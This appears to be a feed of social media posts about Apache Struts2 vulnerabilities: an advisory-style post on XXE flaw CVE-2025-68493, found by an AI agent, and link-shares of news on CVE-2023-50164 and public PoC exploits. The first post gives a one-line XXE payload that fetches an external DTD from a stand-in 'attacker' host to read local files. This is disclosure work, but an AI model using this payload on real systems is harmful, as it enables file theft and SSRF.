CVE-2025-68493: Apache Struts2 XWork-Core XXE

Technical Breakdown: Our AI agent - ZAST.AI uncovered an XXE flaw in com.opensymphony.xwork2.util.DomHelper.parse(). The root cause is a raw SAXParserFactory initialization that lacks security feature flags: factory.setFeature("http://xml.org/sax/features/external-general-entities", false); // MISSING

Attack Vector: By manipulating the InputSource, an attacker can inject a malicious DTD.
- Payload: <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
- Result: Full LFI (e.g., /etc/passwd, win.ini) and SSRF capabilities.

Status: Assigned CVE-2025-68493.

Affects Struts2 <= 6.0.3. Patching is critical.

🔗 Vulnerability reports: https://cwiki.apache.org/confluence/display/WW/S2-069

#XXE #CyberSecurity #ZAST #CVE #ApacheStruts2

CVE-2023-50164 exposes a potential avenue for attackers to manipulate file upload parameters, thereby enabling path traversal.

#Cybersecurity #ApacheStruts2 #Vulnerability #RCE #Apache

https://cybersec84.wordpress.com/2023/12/10/critical-apache-struts-2-rce-vulnerability-patched-urgent-upgrade-recommended/

Critical Apache Struts 2 RCE Vulnerability Patched – Urgent Upgrade Recommended

The Apache Struts project has recently issued crucial updates for its widely-used open-source web application framework, addressing a critical vulnerability identified as CVE-2023-50164. This vulne…

CyberSec84 | Cybersecurity news.
PoC Exploit Targeting Apache Struts Surfaces on GitHub - Researchers have discovered freely available PoC code and exploit that can be used to attack unpat... https://threatpost.com/poc-exploit-github-apache-struts/158393/ #object-graphnavigationlanguage #apachestrutssecurityteam #proof-of-concept #vulnerabilities #apachestruts2 #cve-2019-0230 #cve-2019-0233 #websecurity #github #hacks #ognl #dos #poc
PoC Exploit Targeting Apache Struts Surfaces on GitHub

Researchers have discovered freely available PoC code and exploit that can be used to attack unpatched security holes in Apache Struts 2.

Threatpost - English - Global - threatpost.com